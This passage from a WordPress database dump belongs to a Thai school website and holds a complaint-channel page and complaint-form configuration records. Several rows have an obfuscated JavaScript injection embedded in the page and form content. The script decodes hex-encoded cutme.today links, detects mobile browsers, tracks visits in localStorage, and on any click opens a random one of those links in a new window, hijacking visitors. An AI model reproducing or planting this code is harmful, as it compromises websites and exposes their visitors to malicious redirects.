)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ช่องทางการร้องเรียนเรื่องทั่วไป','','publish','closed','closed','','%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87','','','2025-07-03 15:12:56','2025-07-03 08:12:56','',0,'http://pakhaeng.ssk.in.th/?page_id=484',0,'page','',0),
(485,1,'2024-08-02 11:41:36','2024-08-02 04:41:36','','ช่องการร้องเรียนเรื่องทั่วไป','','inherit','closed','closed','','484-revision-v1','','','2024-08-02 11:41:36','2024-08-02 04:41:36','',484,'http://pakhaeng.ssk.in.th/?p=485',0,'revision','',0),
(486,1,'2024-08-02 11:44:38','2024-08-02 04:44:38','{\"fields\":{\"1\":{\"id\":\"1\",\"type\":\"name\",\"label\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e1c\\u0e39\\u0e49\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"2\":{\"id\":\"2\",\"type\":\"textarea\",\"label\":\"\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"3\":{\"id\":\"3\",\"type\":\"text\",\"label\":\"\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"textarea\",\"label\":\"\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"number\",\"label\":\"\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c (\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49)\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"checkbox\",\"label\":\"\\u0e02\\u0e49\\u0e32\\u0e1e\\u0e40\\u0e08\\u0e49\\u0e32\\u0e02\\u0e2d\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e27\\u0e48\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e32\\u0e23 \\u0e2b\\u0e32\\u0e01\\u0e1b\\u0e23\\u0e32\\u0e01\\u0e0e\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e02\\u0e49\\u0e32\\u0e1e\\u0e40\\u0e08\\u0e49\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e2b\\u0e49\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e15\\u0e32\\u0e21\\u0e01\\u0e0e\\u0e2b\\u0e21\\u0e32\\u0e22\",\"choices\":{\"1\":{\"label\":\"\\u0e22\\u0e2d\\u0e1a\\u0e23\\u0e31\\u0e1a\\u0e02\\u0e49\\u0e2d\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#066aab\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"input_columns\":\"\",\"choice_limit\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"}},\"id\":\"486\",\"field_id\":7,\"settings\":{\"form_title\":\"\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\",\"form_desc\":\"\",\"submit_text\":\"\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"33010169@sisaketedu1.go.th\",\"subject\":\"New \\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b Entry\",\"sender_name\":\"\\u0e42\\u0e23\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e1a\\u0e49\\u0e32\\u0e19\\u0e2b\\u0e19\\u0e2d\\u0e07\\u0e1b\\u0e25\\u0e32\\u0e40\\u0e02\\u0e47\\u0e07-\\u0e01\\u0e2d\\u0e44\\u0e2b\\u0e25\\u0e48\",\"sender_address\":\"{admin_email}\",\"replyto\":\"\\u0e37\\u0e35nutkubp@gmail.com\",\"message\":\"{all_fields}\",\"template\":\"\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>\\u00a0\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19 \\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e23\\u0e49\\u0e2d\\u0e22\\u0e41\\u0e25\\u0e49\\u0e27<\\/p>\",\"message_scroll\":\"1\",\"page\":\"459\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[],\"store_spam_entries\":\"0\"},\"search_terms\":\"\",\"meta\":{\"template\":\"blank\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ร้องเรียนเรื่องทั่วไป','','publish','closed','closed','','%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b1%e0%b9%88%e0%b8%a7%e0%b9%84%e0%b8%9b','','','2024-08-02 11:52:20','2024-08-02 04:52:20','',0,'http://pakhaeng.ssk.in.th/?post_type=wpforms&#038;p=486',0,'wpforms','',0),
(487,1,'2024-08-02 11:44:42','2024-08-02 04:44:42','{\"fields\":[],\"id\":\"486\",\"field_id\":1,\"settings\":{\"form_title\":\"\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New \\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b Entry\",\"sender_name\":\"\\u0e42\\u0e23\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e1a\\u0e49\\u0e32\\u0e19\\u0e2b\\u0e19\\u0e2d\\u0e07\\u0e1b\\u0e25\\u0e32\\u0e40\\u0e02\\u0e47\\u0e07-\\u0e01\\u0e2d\\u0e44\\u0e2b\\u0e25\\u0e48\",\"sender_address\":\"{admin_email}\",\"replyto\":\"\",\"message\":\"{all_fields}\",\"template\":\"\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"459\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[],\"store_spam_entries\":\"0\"},\"search_terms\":\"\",\"meta\":{\"template\":\"blank\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 